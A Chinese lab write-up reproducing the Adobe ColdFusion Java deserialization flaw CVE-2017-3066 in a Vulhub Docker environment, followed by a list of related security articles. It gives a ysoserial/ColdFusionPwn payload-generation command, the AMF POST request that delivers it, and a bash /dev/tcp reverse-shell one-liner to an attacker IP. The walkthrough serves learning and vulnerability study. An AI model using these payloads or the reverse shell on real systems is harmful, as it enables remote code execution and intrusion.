利用Vulnhub复现漏洞 - Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)

2023-11-14

Vulnhub官方复现教程

https://vulhub.org/#/environments/coldfusion/CVE-2017-3066/

漏洞原理

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。

Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。

参考链接:

复现漏洞

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056

进入路径为

cd /root/vulhub/coldfusion/CVE-2017-3066

搭建及运行漏洞环境:

docker-compose build && docker-compose up -d

此本安装环境需要大概1G+的数据下载,网络不好的起来走动走动吧:)
在这里插入图片描述
环境启动成功后,访问http://your-ip:8500/CFIDE/administrator/index.cfm,输入密码vulhub,即可成功安装Adobe ColdFusion。
在这里插入图片描述
【注意】本文中所有的your-ip请改为自己的IP地址

漏洞复现

生成POC

使用ColdFusionPwn工具来生成POC。
下载ColdFusionPwn
下载ysoserial
【注意】下载的jar包可能因为时间不同,而更新,包名也就不同。注意将命令中的包名,替换为你下载时候的名字

java -cp ColdFusionPwn.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/CVE-2017-3066_is_success' poc.ser

【再注意】上面的命令在Win10下我没有执行成功,错误提示为错误: 找不到或无法加载主类 com.codewhitesec.coldfusionpwn.ColdFusionPwner。在Kali成功生成了?

发送POC

生成poc.ser文件后,将POC作为数据包body发送给http://your-ip:8500/flex2gateway/amf,Content-Type为application/x-amf

POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853

[...poc...]

在这里插入图片描述

发送POC内容

由于编码问题,如果直接从Notepad++/Notepad里面复制粘贴为body部分,是不成功的,即使返回的状态码是200
在这里插入图片描述
正确发送方式为:
右击选择Paste From File,上传poc.cer文件
在这里插入图片描述
【感谢豆老师?的纠错,以及科普编码问题】?
再到Raw界面添加HTTP头部,如果成功,并且打算以后还需要用的话,右击选择Copy to File保存
在这里插入图片描述

检验POC

进入容器
通过DockerID进入容器
docker exec -it 容器ID /bin/bash  
查看容器ID
docker ps

在这里插入图片描述

通过Docker名字进入容器
docker-compose exec 容器名字 bash

比如本次环境中是:

docker-compose exec coldfusion bash
查看/tmp/
ls /tmp/

发现/tmp/success已成功创建:
在这里插入图片描述
将POC改成反弹命令,成功拿到shell:
在这里插入图片描述

反弹Shell

格式

bash -i >& /dev/tcp/ip/port 0>&1

例子

比如监听192.168.236.138的333端口

bash -i >& /dev/tcp/192.168.236.138/333 0>&1
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

利用Vulnhub复现漏洞 - Adobe ColdFusion 反序列化漏洞(CVE-2017-3066) 的相关文章

  • vulnhub靶场之THALES: 1

    x1f680 优质资源分享 x1f680 学习路线指引 xff08 点击解锁 xff09 知识定位人群定位 x1f9e1 Python实战微信订餐小程序 x1f9e1 进阶级本课程是python flask 43 微信小程序的完美结合 xf
  • 【vulnhub靶场】PRIME:1打靶过程记录

    最近发现一个很有趣的靶场集合 里面涵盖了一些基本的漏洞 我们通过漏洞复现 了解一些网络安全的一些基本操作 PRIME 1靶机下载链接 Prime 1 环境准备 安装Kali系统 安装方法请参考这篇文章https blog csdn net
  • 利用Vulnhub复现漏洞 - JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

    JBoss 4 x JBossMQ JMS 反序列化漏洞 CVE 2017 7504 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 发送POC 通过命令 通过 BurpSuit 发送 检测POC是否成功 Vulnhub
  • 跨站请求伪造CSRF(Cross-site request forgery)

    目录 一 什么是CSRF 二 可能存在CSRF攻击的三个条件 一个相关的动作 基于 Cookie 的会话处理 没有不可预测的请求参数 二 常见的CSRF攻击 1 CSRF令牌的验证取决与请求方法 2 CSRF令牌的验证取决与令牌是否存在 3
  • SQL布尔盲注

    SQL布尔盲注 常用函数 注入步骤 1 爆数据库名称长度 2 爆库名 3 确定当前库中表的个数 4 爆表名长度 5 爆表名 6 爆表项个数 7 爆表项长度 8 爆表项 9 爆数据 常用函数 substr str from length 返回
  • Kioptrix Level 2-writeup

    Kioptrix Level 2 writeup 0x00 信息收集 目标机器 16 16 16 178 kali攻击机 16 16 16 177 使用nmap来个端口服务扫描 浏览器打开http 16 16 16 178看看 第一眼看上去
  • 利用Vulnhub复现漏洞 - Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)

    Apache Log4j Server 反序列化命令执行漏洞 CVE 2017 5645 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 payload 检测 Vulnhub官方复现教程 https vulhub org
  • vulnhub blogger: 1

    渗透思路 nmap扫描端口 gobuster扫描网站目录 wpscan发现wordpress漏洞插件 利用插件wpdiscuz的未授权的任意文件上传漏洞 CVE 2020 24186 getshell 弱密码提权 环境信息 靶机 192 1
  • 利用Vulnhub复现漏洞 - Gogs 任意用户登录漏洞(CVE-2018-18925)

    Gogs 任意用户登录漏洞 CVE 2018 18925 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 失误原因 Vulnhub官方复现教程 https vulhub org environments gogs CVE
  • kali使用aircrack无线攻击wifi超详细步骤(包含监听网卡启动,获得握手包,密码本生成)

    平台及工具 linux kali平台 aircrack ng 工具 免驱监听网卡 详细操作 1 首先启动kali 插入网卡 输入ifconfig查看kali是否检测到监听网卡 注意监听网卡要免驱动的 ifconfig 查看自身网卡信息 如图
  • ATT&CK - T1546.003

    事件触发的执行 WMI事件订阅 目的 出现场景 ATT CK T1546 003 https attack mitre org techniques T1546 003 检查方式 复现方式 目的 建立持久性 出现场景 比如一些病毒的启动方式
  • 利用Vulnhub复现漏洞 - Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)

    Adobe ColdFusion 反序列化漏洞 CVE 2017 3066 Vulnhub官方复现教程 漏洞原理 复现漏洞 启动环境 漏洞复现 生成POC 发送POC 发送POC内容 检验POC 进入容器 通过DockerID进入容器 查看
  • kali linux配置网络代理

    一 命令行终端 1 进入 etc profile d目录 新建文件proxy sh 内容如下 kali kali etc profile d cat proxy sh export proxy http 192 168 150 1 7890
  • 利用Vulnhub复现漏洞 - Imagetragick 命令执行漏洞(CVE-2016–3714)

    Imagetragick 命令执行漏洞 CVE 2016 3714 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 浏览器设置 BurpSuit设置 上传POC 反弹shell POC Vulnhub官方复现教
  • sqli-less-26-less26a

    less 26 单引号 GET型 这关就有点过滤的意思了 过滤了上一关的东西 并且把空格和 23给过滤了 如果是ubuntu的话 可以用 0a等绕过 方便一些 但我的是windows 所以就只能用 了 让后使用 来代替and 用 1来闭合
  • 【Vulnhub】之symfonos1

    一 部署方法 在官网上下载靶机ova环境 https download vulnhub com symfonos symfonos1 7z 使用VMware搭建靶机环境 攻击机使用VMware上搭建的kali 靶机和攻击机之间使用NAT模式
  • 利用Vulnhub复现漏洞 - OpenSSH 用户名枚举漏洞(CVE-2018-15473)

    OpenSSH 用户名枚举漏洞 CVE 2018 15473 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 CVE 2018 15473 Exploit Vulnhub官方复现教程 https vulhub org e
  • XSS 跨站脚本

    XSS 跨站脚本 一 什么是XSS XSS Cross site Scripting 中文名跨站脚本攻击 其原理是攻击者利用浏览器执行前端代码 HTML CSS JavaScript 的特性 将恶意的JavaScript代码插入到页面中 当
  • hack the box—Lame

    扫描 还是老方法nmap fscan得到开放的端口和服务 nmap sV sC sT v T4 10 10 10 3 看到开了445 先来波ms17 010 发现失败 这里还开个21 并且可以知道版本号 直接搜索ftp漏洞 msf正好有对应
  • vulnhub之vegeta

    目录 一 主机发现 二 端口扫描 四 信息收集 五 cyberchef解密 1 两道base64解密 2 save保存 3 qrcode module 4 二维码提取工具zbaring 六 大字典跑目录 七 bulma 八 音频分析软件au

随机推荐

  • C++ sort 排序(降序、升序)使用总结

    一 升序 C sort 函数十分方便 可以对内置类型也可对自定义类型进行快速排序 内置类型的使用比较简单 下面主要讨论自定义类型的排序 一般有如下几种使用方法 1 1 重载比较操作符 比如 我们现有一批学生 要根据他们的成绩进行升序排序 成
  • 基于epoll实现简单的web服务器

    1 简介 epoll 是 Linux 平台下特有的一种 I O 复用模型实现 于 2002 年在 Linux kernel 2 5 44 中被引入 在 epoll 之前 Unix Linux 平台下的 I O 复用模型包含 select 和
  • Excel使用多窗口打开(分屏幕的福音)

    1 材料 Office2010 其他不知道 2 注册表 2 1 Shett 8 2 2 Sheet 12如法炮制 照着图来就行了 话不多说
  • 鸿蒙系统是手机系统还是电脑系统,鸿蒙系统能兼容手机电脑和智能设备,这是怎样实现的?...

    鸿蒙系统它本身支持两种模式 一种是手机模式 一种是电脑模式 就比如现在华为 荣耀的高端手机 单独使用就是手机模式 通过HDMI线连接显示器或者电视屏幕的时候 它就变成了一台电脑 再配合蓝牙或者无线鼠标和键盘 使用体验上和普通的电脑并没有太大
  • 前端面试:如何修改overflow:scroll 滚动条的默认样式-如背景色以及宽度

    如何修改overflow scroll 滚动条的默认背景色以及宽度 使用 webkit scrolbar 自定义样式 复制代码 talk is cheap show me the code Title 所有主流浏览器都支持 overflow
  • 【Python】np.log

    此处先介绍log常用的两个底数计算 以10为底和以e为底 以后再补充完毕 1以10为底 import numpy as np np log10 x 如 gt gt gt np log10 100 2 0 gt gt gt 2 e为底 log
  • Kettle中使用JavaScrip调用jar包对文件内容进行MD5加密

    Kettle中使用JavaScript调用jar包对文件内容进行MD5加密 1 本文主要知识点 JavaScript调用jar包对文件内容进行MD5加密 返回加密md5值 Kettle实现对文件内容的加密 返回加密md5值 2 使用方法 1
  • 多元函数求极值,万能函数——fmincon讲解

    matlab中的函数fmincon可用于求可以求取多元函数的极值 其约束包括五种 1 线性不等式 约束 2 线性等式约束 3 变量约束 4 非线性不等式约束 5 非线性等式约束 其形式如下 x fmincon fun x0 A b Aeq
  • Acrobat里面直接截取部分页面(转存一页或者几页)为独立PDF

    不需要使用foxit福昕reader 在完整版acrobat里面 进入页面缩略图 右键 提取页面 出现如下对话框 1 直接确定 可以得到从214页至219页的独立pdf 2 勾选 提取页面为单独文件 则会有6个pdf
  • 校园网服务器系统需求分析,校园网需求及分析.doc

    校园网需求及分析 校园网络规划与设计 一 毕业设计课题名称 校园网络规划与设计 二 毕业设计任务 1 需求分析 2 系统设计原则和实现目标 1 网络系统设计原则 系统建设目标 2 网络性能分析 3 系统的总体设计 1 网络拓扑结构设计 2
  • 计算机主板上的fan,通用解决方案:计算机主板上的CPU_FAN,SYS_FAN,CHA_FAN,CPU_OPT接口知识...

    在组装计算机的过程中 尽管安装过程很简单 但经常会遇到接线问题 用户经常错误地将CPU散热器的电源线插入SYS FAN 尽管风扇可以旋转 但是在引导时可能会出现F1错误 CPU Fan Error 这也会导致CPU散热器无法智能调节速度 让
  • javafx开发- ImageView标签设置图片不显示

    图片不显示的原因没找到 但是找到了解决办法 嘿嘿 解决问题代码如下
  • flutter之Provider(一)

    网上有不少介绍Provider的文章 但是感觉大部分对于初学者而言不够友好 很多在文章开始就写了大片的代码或者是一通的状态管理的介绍 但是实际上根本不需要那么复杂 本篇文章当然也会简单的介绍Provider的使用 但是我们更多还是通俗的介绍
  • 新手教程!设置PDF文件的页面大小

    设置文档的页面大小是办公一族经常遇到的一种操作 如果是word文档 那简直就是so easy 但在日常工作中 我们偶尔会遇到PDF格式的文件 由于对它不熟悉 想要对PDF文档的页面大小进行修改 又该如何操作呢 这时我们就需要借助一款非常专业
  • 客户价值预测:线性回归模型与诊断(概念)

    客户生命周期可分为四个阶段 潜在客户阶段 响应客户阶段 既得客户阶段 流失客户阶段 本章整体是一个客户价值预测的案例 背景是某信用卡公司在地推活动之后 获取了大量客户的信用卡申请信息 其中一个部分客户顺利开卡 并且有月消费记录 而另外一部分
  • C语言结构体应用-通讯录

    这里写目录标题 总体介绍 一 数据的定义及数据初始化 二 增加联系人 三 删除联系人 四 修改某个联系人 五 显示所有联系人 六 删除所有联系人 七 按名字首字母排序联系人 八 查找联系人 九 代码展示 总体介绍 本文主要介绍一个结构体的应
  • vue 点击事件失效

    点击事件失效的情况 总共有三种 1 没有点到那个元素 比如说div gt span 事件绑定在div上 但是它可能点来点去是在span标签上面 这种情况 把 click点击事件绑定到span上测试一下就好了 如果是被覆盖了 加个这个 sto
  • error while loading shared libraries: libcublasLt.so.11 解决方法

    在运行cuda程序的时候 有时候会遇到此类错误 error while loading shared libraries libcublasLt so 11 问题是两个 确实没有此类库文件 有此库文件 不过没有放在正确的地方 针对第一类 如
  • Java实现将JSON文件导出到Excel

    文章目录 一 运行环境 二 需求描述 三 实现思路 四 实现代码 一 运行环境 windows10 IDEA 2022 JDK 8 Maven 3 8 6 Apache POI 5 fastjson2 二 需求描述 写一个功能 任意json
  • 利用Vulnhub复现漏洞 - Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)

    Adobe ColdFusion 反序列化漏洞 CVE 2017 3066 Vulnhub官方复现教程 漏洞原理 复现漏洞 启动环境 漏洞复现 生成POC 发送POC 发送POC内容 检验POC 进入容器 通过DockerID进入容器 查看